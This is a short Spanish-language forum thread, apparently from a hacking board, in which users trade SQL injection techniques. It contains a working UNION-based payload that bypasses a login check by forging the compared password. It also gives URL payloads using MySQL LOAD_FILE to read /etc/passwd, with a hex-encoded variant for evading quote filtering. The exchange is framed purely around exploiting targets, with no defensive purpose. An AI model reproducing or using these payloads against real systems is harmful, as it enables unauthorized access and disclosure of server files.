Hola gente, tengo una duda, que puedo explotar en la siguiente query:
SELECT clave FROM users WHERE us='{X}'
Puedo inyectar en {X}, pero no acepta comandos concatenados (poner ";" y poner despues otro comando).
A alguien se le ocurre algo???
usandio union capaz?
http://sql.1keydata.com/es/sql-union.php
Pero no me va a devolver la tabla usando UNION, xq lo q hace es buscar el password en la tabla, lo almacena en una variable y despues lo compara con el q le pones como "password"...
usuario: ' union select 'lalala
password: lalala
Claro! como no lo habia pensado...
Graciass!!
Para no crear un nuevo tema, alguien sabe como usar la funcion Load_file en una inyeccion mysql?
es con union select creo recordar
union select
union select 1,load_file(archivo),2,3...
foro.elhacker.net/bugs_y_exploits/dataextract_databaseuserversion_by_ozx-t229414.0.html
http://www.site.com/?id=-1 union select 1,load_file('/etc/passwd'),3,...
o si filtra las comillas, en HEX:
http://www.site.com/?id=-1 union select 1,load_file(0x2f6574632f706173737764),3,...
Gracias gente ;)